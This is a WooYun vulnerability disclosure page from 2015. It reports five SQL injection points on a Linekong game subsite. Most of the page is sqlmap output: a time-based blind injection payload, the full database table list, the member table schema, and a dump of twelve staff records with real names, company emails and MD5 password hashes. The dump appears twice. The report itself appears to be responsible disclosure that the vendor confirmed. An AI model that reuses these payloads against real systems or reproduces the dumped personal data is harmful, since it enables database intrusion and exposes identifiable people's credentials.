当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0117094

漏洞标题:蓝港某分站SQL注入5处打包提交(涉及用户数据)

相关厂商:linekong.com

漏洞作者: hh2014

提交时间:2015-05-30 10:22

修复时间:2015-07-16 11:12

公开时间:2015-07-16 11:12

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-05-30: 细节已通知厂商并且等待厂商处理中
2015-06-01: 厂商已经确认,细节仅向厂商公开
2015-06-11: 细节向核心白帽子及相关领域专家公开
2015-06-21: 细节向普通白帽子公开
2015-07-01: 细节向实习白帽子公开
2015-07-16: 细节向公众公开

简要描述:

sql注入打包

详细说明:

sql注入点
注入点1:

http://xy.linkong.com/activity/love_code/_ajax.html.php?option=*&qid=1011&timeStame=1432905762461n62363&types=1


option参数存在sql注入
注入点2:

http://xy.linkong.com/picture.php?page=2&sort_id=*


sort_id参数存在sql注入
注入点3:

http://xy.linkong.com/xml/bcastr.php?num=5&sort_id=*


sort_id参数存在sql注入
注入点4:

http://xy.linkong.com/xml/common.php?num=5&sort_id=*


sort_id参数存在sql注入
注入点5:

http://xy.linkong.com/wallpaper.php?page=2&sort_id=*


sort_id 参数存在sql注入
sqlmap证明
注意参数level=5 --no-cast (level=5)

sqlmap identified the following injection points with a total of 2367 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: http://xy.linekong.com:80/activity/love_code/_ajax.html.php?option='||(SELECT 'xEzN' FROM DUAL WHERE 8847=8847 AND SLEEP(5))||'&qid=1011&timeStame=1432905762461n62363&types=1
    Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
---
web application technology: Apache
back-end DBMS: MySQL 5.0.11
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: http://xy.linekong.com:80/activity/love_code/_ajax.html.php?option='||(SELECT 'xEzN' FROM DUAL WHERE 8847=8847 AND SLEEP(5))||'&qid=1011&timeStame=1432905762461n62363&types=1
    Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
---
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: http://xy.linekong.com:80/activity/love_code/_ajax.html.php?option='||(SELECT 'xEzN' FROM DUAL WHERE 8847=8847 AND SLEEP(5))||'&qid=1011&timeStame=1432905762461n62363&types=1
    Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
---
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: http://xy.linekong.com:80/activity/love_code/_ajax.html.php?option='||(SELECT 'xEzN' FROM DUAL WHERE 8847=8847 AND SLEEP(5))||'&qid=1011&timeStame=1432905762461n62363&types=1
    Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
---
web application technology: Apache
back-end DBMS: MySQL 5
current user:    'xyweb@172.16.9.162'
current user is DBA:    False
available databases [2]:
[*] information_schema
[*] xy_web
Database: xy_web
[234 tables]
+--------------------------------------------+
| xy_act_oldgame_log                         |
| xy_act_prize_log                           |
| xy_act_prize_log_20131224                  |
| xy_activity_10wan                          |
| xy_activity_10wan_card                     |
| xy_activity_10wan_info                     |
| xy_activity_10wan_info2nd                  |
| xy_activity_10wan_lottery                  |
| xy_activity_20100815                       |
| xy_activity_20100815_info_log              |
| xy_activity_20100815_netpas_code_log       |
| xy_activity_20100815_taobao_invite         |
| xy_activity_20100815_taobao_sales          |
| xy_activity_20100815_taobao_sales_log      |
| xy_activity_2011midautumn_ecard            |
| xy_activity_2011midautumn_items            |
| xy_activity_2011midautumn_userinfo         |
| xy_activity_300wan                         |
| xy_activity_6gift_getlog                   |
| xy_activity_6gift_log                      |
| xy_activity_6gift_sign                     |
| xy_activity_activation_log                 |
| xy_activity_army_draw_log                  |
| xy_activity_army_info                      |
| xy_activity_army_member                    |
| xy_activity_army_vote_log                  |
| xy_activity_armycreate_log                 |
| xy_activity_armygetgift_log                |
| xy_activity_back                           |
| xy_activity_beautyvote_player              |
| xy_activity_beautyvote_voter               |
| xy_activity_blissfulcard_cdkey             |
| xy_activity_blissfulcard_log               |
| xy_activity_brother_activate_log           |
| xy_activity_brother_code_log               |
| xy_activity_bysf_guestbook                 |
| xy_activity_bysf_log                       |
| xy_activity_bysf_passport                  |
| xy_activity_bysf_question                  |
| xy_activity_chit_code                      |
| xy_activity_date                           |
| xy_activity_date_log                       |
| xy_activity_duowanvip_code                 |
| xy_activity_duowanvip_log                  |
| xy_activity_familybattle_army              |
| xy_activity_familybattle_army_back         |
| xy_activity_familybattle_army_prepare      |
| xy_activity_familybattle_army_prepare_back |
| xy_activity_familybattle_armychief         |
| xy_activity_familybattle_armychief_back    |
| xy_activity_familybattle_lottery_log       |
| xy_activity_fenliulottery_log              |
| xy_activity_first_cdkey                    |
| xy_activity_first_cdkey_state              |
| xy_activity_foyuan_cdkey                   |
| xy_activity_foyuan_log                     |
| xy_activity_foyuan_message                 |
| xy_activity_getchit_log                    |
| xy_activity_gg_cdkey                       |
| xy_activity_gg_cdkey_state                 |
| xy_activity_gh_level                       |
| xy_activity_goldeneyes_cdkey               |
| xy_activity_goldeneyes_cdkey_state         |
| xy_activity_goldeneyes_dayinfo             |
| xy_activity_goldeneyes_doublekey           |
| xy_activity_guestbook                      |
| xy_activity_hopewall                       |
| xy_activity_hopewall_bless                 |
| xy_activity_huikui_answer_log              |
| xy_activity_huikui_lottery_log             |
| xy_activity_jh2_log                        |
| xy_activity_jh2_member                     |
| xy_activity_jh2_taobao                     |
| xy_activity_jh2_taobao_log                 |
| xy_activity_jh_log                         |
| xy_activity_jh_member                      |
| xy_activity_jianding_log                   |
| xy_activity_jianmianhui                    |
| xy_activity_jiaozi_log                     |
| xy_activity_joinarmy_log                   |
| xy_activity_journey_cdkey                  |
| xy_activity_journey_cdkey_state            |
| xy_activity_journey_dayinfo                |
| xy_activity_journey_gc                     |
| xy_activity_journey_gc_log                 |
| xy_activity_king_log                       |
| xy_activity_kingbattle_army                |
| xy_activity_kingbattle_army_prepare        |
| xy_activity_kingbattle_armychief           |
| xy_activity_kingbattle_lottery_log         |
| xy_activity_lostself_code_log              |
| xy_activity_lostself_exchange_log          |
| xy_activity_lostself_transfer_log          |
| xy_activity_lover                          |
| xy_activity_lv20_log                       |
| xy_activity_lv20_member                    |
| xy_activity_lv30_log                       |
| xy_activity_lv30_log1                      |
| xy_activity_lv40_card_10                   |
| xy_activity_lv40_card_30                   |
| xy_activity_lv40_log                       |
| xy_activity_lv40_member                    |
| xy_activity_lv60_log1                      |
| xy_activity_makewishes                     |
| xy_activity_makewishes_draw_log            |
| xy_activity_meeting                        |
| xy_activity_name_log                       |
| xy_activity_namegc_log                     |
| xy_activity_neg_player                     |
| xy_activity_neg_voter                      |
| xy_activity_new_act                        |
| xy_activity_newact_itemlog                 |
| xy_activity_newlottery                     |
| xy_activity_newyear_log                    |
| xy_activity_nverguo2                       |
| xy_activity_nverguo_cdkey                  |
| xy_activity_nverguo_log                    |
| xy_activity_old_player                     |
| xy_activity_oldfriends1_gift_log           |
| xy_activity_oldfriends1_verify_inviter     |
| xy_activity_oldfriends_exchange_log        |
| xy_activity_oldfriends_inviter             |
| xy_activity_oldfriends_oldplayer           |
| xy_activity_oldfriends_verify_inviter      |
| xy_activity_opg_card                       |
| xy_activity_opg_log                        |
| xy_activity_opg_turnround_card             |
| xy_activity_opg_turnround_log              |
| xy_activity_opg_user                       |
| xy_activity_package_card                   |
| xy_activity_package_card_log               |
| xy_activity_package_gift_log               |
| xy_activity_pagoda_log                     |
| xy_activity_people_vote_check              |
| xy_activity_people_vote_log                |
| xy_activity_people_vote_man_log            |
| xy_activity_privilege_card                 |
| xy_activity_privilege_log                  |
| xy_activity_qb                             |
| xy_activity_qb2nd                          |
| xy_activity_qb3rd                          |
| xy_activity_qb4th                          |
| xy_activity_qb5th                          |
| xy_activity_qb5th_bak                      |
| xy_activity_qixi                           |
| xy_activity_qmxscj_card                    |
| xy_activity_qmxscj_log                     |
| xy_activity_qqlz                           |
| xy_activity_qqlz_cdkey                     |
| xy_activity_rally_giver                    |
| xy_activity_rally_invitee                  |
| xy_activity_renzheng_log                   |
| xy_activity_rushlevel                      |
| xy_activity_shenlian_cdkey                 |
| xy_activity_shenlian_cdkey_log             |
| xy_activity_song_log                       |
| xy_activity_songfinal_userinfo             |
| xy_activity_songfinal_voteinfo             |
| xy_activity_survey_code                    |
| xy_activity_survey_log                     |
| xy_activity_survey_question                |
| xy_activity_tequan_card                    |
| xy_activity_tequan_log                     |
| xy_activity_vote_log                       |
| xy_activity_vote_query                     |
| xy_activity_welfare_cdkey                  |
| xy_activity_welfare_log                    |
| xy_activity_welfare_message                |
| xy_activity_wudidong_chongji               |
| xy_activity_wudidong_jifen                 |
| xy_activity_xunyou_ge                      |
| xy_activity_xunyou_ge_cdkey                |
| xy_activity_xunyou_log                     |
| xy_activity_xyl                            |
| xy_activity_xyvip_gift_log                 |
| xy_activity_xyvip_log                      |
| xy_activity_zhailing_cdkey                 |
| xy_activity_zhailing_log                   |
| xy_activity_zhanbu                         |
| xy_activity_zhuanpan                       |
| xy_activity_zhuanpan_voucher               |
| xy_activity_zhuanpan_voucher_log           |
| xy_activity_zhufu_bless                    |
| xy_activity_zhufu_log                      |
| xy_activity_zhufu_lottery                  |
| xy_address                                 |
| xy_article                                 |
| xy_article_demo                            |
| xy_article_inserl                          |
| xy_build                                   |
| xy_channel                                 |
| xy_columns                                 |
| xy_comment                                 |
| xy_demo                                    |
| xy_download                                |
| xy_editors_inserl                          |
| xy_flash                                   |
| xy_grading                                 |
| xy_group                                   |
| xy_image                                   |
| xy_image_inserl                            |
| xy_jnh_5173card_log                        |
| xy_jnh_gift                                |
| xy_jnh_gift_log                            |
| xy_jnh_luck                                |
| xy_jnh_luck_log                            |
| xy_jnh_passport_log                        |
| xy_jnh_receive_log                         |
| xy_login_game_history                      |
| xy_lottery_20100209_state                  |
| xy_lottery_count                           |
| xy_lottery_log                             |
| xy_mall_exchange_log                       |
| xy_mall_lottery_log                        |
| xy_member                                  |
| xy_pass_card_list                          |
| xy_pass_card_list_log                      |
| xy_passportstat                            |
| xy_sort                                    |
| xy_special_like_vote                       |
| xy_special_taici_vote                      |
| xy_taobao_voucher                          |
| xy_taobao_voucher_log                      |
| xy_template                                |
| xy_types                                   |
| xy_url                                     |
| xy_url_inserl                              |
| xy_vote                                    |
| xy_vote_inserl                             |
| xy_vote_option                             |
| xy_wj_article                              |
| xy_wj_article_inserl                       |
| xy_wj_image                                |
| xy_wj_image_inserl                         |
+--------------------------------------------+
Database: xy_web
Table: xy_member
[26 columns]
+----------------+--------------+
| Column         | Type         |
+----------------+--------------+
| address_id     | int(11)      |
| article_id     | int(11)      |
| group_id       | int(11)      |
| id             | int(11)      |
| image_id       | int(11)      |
| nickname       | varchar(64)  |
| uadd_time      | datetime     |
| url_id         | int(11)      |
| user_age       | date         |
| user_Dreply    | int(11)      |
| user_Dtopic    | int(11)      |
| user_email     | varchar(32)  |
| user_grading   | varchar(64)  |
| user_jointime  | datetime     |
| user_like      | varchar(255) |
| user_movephone | varchar(32)  |
| user_msn       | varchar(128) |
| user_name      | varchar(32)  |
| user_passwd    | varchar(32)  |
| user_perfect   | int(11)      |
| user_qq        | int(11)      |
| user_sex       | int(2)       |
| user_state     | int(2)       |
| user_Treply    | int(11)      |
| user_Ttopic    | int(11)      |
| vote_id        | int(11)      |
+----------------+--------------+
Database: xy_web
Table: xy_member
[12 entries]
+-------------------------+------------+-----------+----------------------------------+
| user_email              | nickname   | user_name | user_passwd                      |
+-------------------------+------------+-----------+----------------------------------+
| shixi@linekong.com      | shixi      | 实习生       | 003be2507cfad94f1efb32fe3fd0d0ec |
| lizhi@linekong.com      | lz         | 李治        | cd9dac6dbb33988a3214e7ba85d272fc |
| liuzhigang@linekong.com | liuzg      | 刘志刚       | 30fed3a8f7747d5b55707b5ebfe4dc77 |
| <blank>                 | tech       | 运维值班工程师   | de61d9913528e5cc7c0668ad72f53730 |
| <blank>                 | sc         | 邵辰        | d54185b71f614c30a396ac4bc44d3269 |
| dongyong@linekong.com   | doyo       | 董勇        | 862f3760ca3293437b53cac01b0ffe29 |
| <blank>                 | ly         | 卢媛        | e728b47751c6555942cb60f97d1e4553 |
| <blank>                 | hqy        | 韩秋莹       | 2f090f77c0d55fdf508e324140050160 |
| <blank>                 | zc         | 张晨        | 89af113d6dd2855f21cabe600370c8f0 |
| <blank>                 | xyjchanpin | 若若        | f5bf48aa40cad7891eb709fcf1fde128 |
| <blank>                 | kf         | 孔飞        | d3789a3f91258fcf605452196e19c21c |
| <blank>                 | fj         | 冯娟        | d320fe2508d6dbbd97efe367e2798408 |
+-------------------------+------------+-----------+----------------------------------+


漏洞证明:

[*] information_schema
[*] xy_web
Database: xy_web
[234 tables]
+--------------------------------------------+
| xy_act_oldgame_log                         |
| xy_act_prize_log                           |
| xy_act_prize_log_20131224                  |
| xy_activity_10wan                          |
| xy_activity_10wan_card                     |
| xy_activity_10wan_info                     |
| xy_activity_10wan_info2nd                  |
| xy_activity_10wan_lottery                  |
| xy_activity_20100815                       |
| xy_activity_20100815_info_log              |
| xy_activity_20100815_netpas_code_log       |
| xy_activity_20100815_taobao_invite         |
| xy_activity_20100815_taobao_sales          |
| xy_activity_20100815_taobao_sales_log      |
| xy_activity_2011midautumn_ecard            |
| xy_activity_2011midautumn_items            |
| xy_activity_2011midautumn_userinfo         |
| xy_activity_300wan                         |
| xy_activity_6gift_getlog                   |
| xy_activity_6gift_log                      |
| xy_activity_6gift_sign                     |
| xy_activity_activation_log                 |
| xy_activity_army_draw_log                  |
| xy_activity_army_info                      |
| xy_activity_army_member                    |
| xy_activity_army_vote_log                  |
| xy_activity_armycreate_log                 |
| xy_activity_armygetgift_log                |
| xy_activity_back                           |
| xy_activity_beautyvote_player              |
| xy_activity_beautyvote_voter               |
| xy_activity_blissfulcard_cdkey             |
| xy_activity_blissfulcard_log               |
| xy_activity_brother_activate_log           |
| xy_activity_brother_code_log               |
| xy_activity_bysf_guestbook                 |
| xy_activity_bysf_log                       |
| xy_activity_bysf_passport                  |
| xy_activity_bysf_question                  |
| xy_activity_chit_code                      |
| xy_activity_date                           |
| xy_activity_date_log                       |
| xy_activity_duowanvip_code                 |
| xy_activity_duowanvip_log                  |
| xy_activity_familybattle_army              |
| xy_activity_familybattle_army_back         |
| xy_activity_familybattle_army_prepare      |
| xy_activity_familybattle_army_prepare_back |
| xy_activity_familybattle_armychief         |
| xy_activity_familybattle_armychief_back    |
| xy_activity_familybattle_lottery_log       |
| xy_activity_fenliulottery_log              |
| xy_activity_first_cdkey                    |
| xy_activity_first_cdkey_state              |
| xy_activity_foyuan_cdkey                   |
| xy_activity_foyuan_log                     |
| xy_activity_foyuan_message                 |
| xy_activity_getchit_log                    |
| xy_activity_gg_cdkey                       |
| xy_activity_gg_cdkey_state                 |
| xy_activity_gh_level                       |
| xy_activity_goldeneyes_cdkey               |
| xy_activity_goldeneyes_cdkey_state         |
| xy_activity_goldeneyes_dayinfo             |
| xy_activity_goldeneyes_doublekey           |
| xy_activity_guestbook                      |
| xy_activity_hopewall                       |
| xy_activity_hopewall_bless                 |
| xy_activity_huikui_answer_log              |
| xy_activity_huikui_lottery_log             |
| xy_activity_jh2_log                        |
| xy_activity_jh2_member                     |
| xy_activity_jh2_taobao                     |
| xy_activity_jh2_taobao_log                 |
| xy_activity_jh_log                         |
| xy_activity_jh_member                      |
| xy_activity_jianding_log                   |
| xy_activity_jianmianhui                    |
| xy_activity_jiaozi_log                     |
| xy_activity_joinarmy_log                   |
| xy_activity_journey_cdkey                  |
| xy_activity_journey_cdkey_state            |
| xy_activity_journey_dayinfo                |
| xy_activity_journey_gc                     |
| xy_activity_journey_gc_log                 |
| xy_activity_king_log                       |
| xy_activity_kingbattle_army                |
| xy_activity_kingbattle_army_prepare        |
| xy_activity_kingbattle_armychief           |
| xy_activity_kingbattle_lottery_log         |
| xy_activity_lostself_code_log              |
| xy_activity_lostself_exchange_log          |
| xy_activity_lostself_transfer_log          |
| xy_activity_lover                          |
| xy_activity_lv20_log                       |
| xy_activity_lv20_member                    |
| xy_activity_lv30_log                       |
| xy_activity_lv30_log1                      |
| xy_activity_lv40_card_10                   |
| xy_activity_lv40_card_30                   |
| xy_activity_lv40_log                       |
| xy_activity_lv40_member                    |
| xy_activity_lv60_log1                      |
| xy_activity_makewishes                     |
| xy_activity_makewishes_draw_log            |
| xy_activity_meeting                        |
| xy_activity_name_log                       |
| xy_activity_namegc_log                     |
| xy_activity_neg_player                     |
| xy_activity_neg_voter                      |
| xy_activity_new_act                        |
| xy_activity_newact_itemlog                 |
| xy_activity_newlottery                     |
| xy_activity_newyear_log                    |
| xy_activity_nverguo2                       |
| xy_activity_nverguo_cdkey                  |
| xy_activity_nverguo_log                    |
| xy_activity_old_player                     |
| xy_activity_oldfriends1_gift_log           |
| xy_activity_oldfriends1_verify_inviter     |
| xy_activity_oldfriends_exchange_log        |
| xy_activity_oldfriends_inviter             |
| xy_activity_oldfriends_oldplayer           |
| xy_activity_oldfriends_verify_inviter      |
| xy_activity_opg_card                       |
| xy_activity_opg_log                        |
| xy_activity_opg_turnround_card             |
| xy_activity_opg_turnround_log              |
| xy_activity_opg_user                       |
| xy_activity_package_card                   |
| xy_activity_package_card_log               |
| xy_activity_package_gift_log               |
| xy_activity_pagoda_log                     |
| xy_activity_people_vote_check              |
| xy_activity_people_vote_log                |
| xy_activity_people_vote_man_log            |
| xy_activity_privilege_card                 |
| xy_activity_privilege_log                  |
| xy_activity_qb                             |
| xy_activity_qb2nd                          |
| xy_activity_qb3rd                          |
| xy_activity_qb4th                          |
| xy_activity_qb5th                          |
| xy_activity_qb5th_bak                      |
| xy_activity_qixi                           |
| xy_activity_qmxscj_card                    |
| xy_activity_qmxscj_log                     |
| xy_activity_qqlz                           |
| xy_activity_qqlz_cdkey                     |
| xy_activity_rally_giver                    |
| xy_activity_rally_invitee                  |
| xy_activity_renzheng_log                   |
| xy_activity_rushlevel                      |
| xy_activity_shenlian_cdkey                 |
| xy_activity_shenlian_cdkey_log             |
| xy_activity_song_log                       |
| xy_activity_songfinal_userinfo             |
| xy_activity_songfinal_voteinfo             |
| xy_activity_survey_code                    |
| xy_activity_survey_log                     |
| xy_activity_survey_question                |
| xy_activity_tequan_card                    |
| xy_activity_tequan_log                     |
| xy_activity_vote_log                       |
| xy_activity_vote_query                     |
| xy_activity_welfare_cdkey                  |
| xy_activity_welfare_log                    |
| xy_activity_welfare_message                |
| xy_activity_wudidong_chongji               |
| xy_activity_wudidong_jifen                 |
| xy_activity_xunyou_ge                      |
| xy_activity_xunyou_ge_cdkey                |
| xy_activity_xunyou_log                     |
| xy_activity_xyl                            |
| xy_activity_xyvip_gift_log                 |
| xy_activity_xyvip_log                      |
| xy_activity_zhailing_cdkey                 |
| xy_activity_zhailing_log                   |
| xy_activity_zhanbu                         |
| xy_activity_zhuanpan                       |
| xy_activity_zhuanpan_voucher               |
| xy_activity_zhuanpan_voucher_log           |
| xy_activity_zhufu_bless                    |
| xy_activity_zhufu_log                      |
| xy_activity_zhufu_lottery                  |
| xy_address                                 |
| xy_article                                 |
| xy_article_demo                            |
| xy_article_inserl                          |
| xy_build                                   |
| xy_channel                                 |
| xy_columns                                 |
| xy_comment                                 |
| xy_demo                                    |
| xy_download                                |
| xy_editors_inserl                          |
| xy_flash                                   |
| xy_grading                                 |
| xy_group                                   |
| xy_image                                   |
| xy_image_inserl                            |
| xy_jnh_5173card_log                        |
| xy_jnh_gift                                |
| xy_jnh_gift_log                            |
| xy_jnh_luck                                |
| xy_jnh_luck_log                            |
| xy_jnh_passport_log                        |
| xy_jnh_receive_log                         |
| xy_login_game_history                      |
| xy_lottery_20100209_state                  |
| xy_lottery_count                           |
| xy_lottery_log                             |
| xy_mall_exchange_log                       |
| xy_mall_lottery_log                        |
| xy_member                                  |
| xy_pass_card_list                          |
| xy_pass_card_list_log                      |
| xy_passportstat                            |
| xy_sort                                    |
| xy_special_like_vote                       |
| xy_special_taici_vote                      |
| xy_taobao_voucher                          |
| xy_taobao_voucher_log                      |
| xy_template                                |
| xy_types                                   |
| xy_url                                     |
| xy_url_inserl                              |
| xy_vote                                    |
| xy_vote_inserl                             |
| xy_vote_option                             |
| xy_wj_article                              |
| xy_wj_article_inserl                       |
| xy_wj_image                                |
| xy_wj_image_inserl                         |
+--------------------------------------------+
Database: xy_web
Table: xy_member
[26 columns]
+----------------+--------------+
| Column         | Type         |
+----------------+--------------+
| address_id     | int(11)      |
| article_id     | int(11)      |
| group_id       | int(11)      |
| id             | int(11)      |
| image_id       | int(11)      |
| nickname       | varchar(64)  |
| uadd_time      | datetime     |
| url_id         | int(11)      |
| user_age       | date         |
| user_Dreply    | int(11)      |
| user_Dtopic    | int(11)      |
| user_email     | varchar(32)  |
| user_grading   | varchar(64)  |
| user_jointime  | datetime     |
| user_like      | varchar(255) |
| user_movephone | varchar(32)  |
| user_msn       | varchar(128) |
| user_name      | varchar(32)  |
| user_passwd    | varchar(32)  |
| user_perfect   | int(11)      |
| user_qq        | int(11)      |
| user_sex       | int(2)       |
| user_state     | int(2)       |
| user_Treply    | int(11)      |
| user_Ttopic    | int(11)      |
| vote_id        | int(11)      |
+----------------+--------------+
Database: xy_web
Table: xy_member
[12 entries]
+-------------------------+------------+-----------+----------------------------------+
| user_email              | nickname   | user_name | user_passwd                      |
+-------------------------+------------+-----------+----------------------------------+
| shixi@linekong.com      | shixi      | 实习生       | 003be2507cfad94f1efb32fe3fd0d0ec |
| lizhi@linekong.com      | lz         | 李治        | cd9dac6dbb33988a3214e7ba85d272fc |
| liuzhigang@linekong.com | liuzg      | 刘志刚       | 30fed3a8f7747d5b55707b5ebfe4dc77 |
| <blank>                 | tech       | 运维值班工程师   | de61d9913528e5cc7c0668ad72f53730 |
| <blank>                 | sc         | 邵辰        | d54185b71f614c30a396ac4bc44d3269 |
| dongyong@linekong.com   | doyo       | 董勇        | 862f3760ca3293437b53cac01b0ffe29 |
| <blank>                 | ly         | 卢媛        | e728b47751c6555942cb60f97d1e4553 |
| <blank>                 | hqy        | 韩秋莹       | 2f090f77c0d55fdf508e324140050160 |
| <blank>                 | zc         | 张晨        | 89af113d6dd2855f21cabe600370c8f0 |
| <blank>                 | xyjchanpin | 若若        | f5bf48aa40cad7891eb709fcf1fde128 |
| <blank>                 | kf         | 孔飞        | d3789a3f91258fcf605452196e19c21c |
| <blank>                 | fj         | 冯娟        | d320fe2508d6dbbd97efe367e2798408 |
+-------------------------+------------+-----------+----------------------------------+


修复方案:

参数过滤

版权声明:转载请注明来源 hh2014@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-06-01 11:10

厂商回复:

感谢指出的问题,已安排相关人员处理

最新状态:

暂无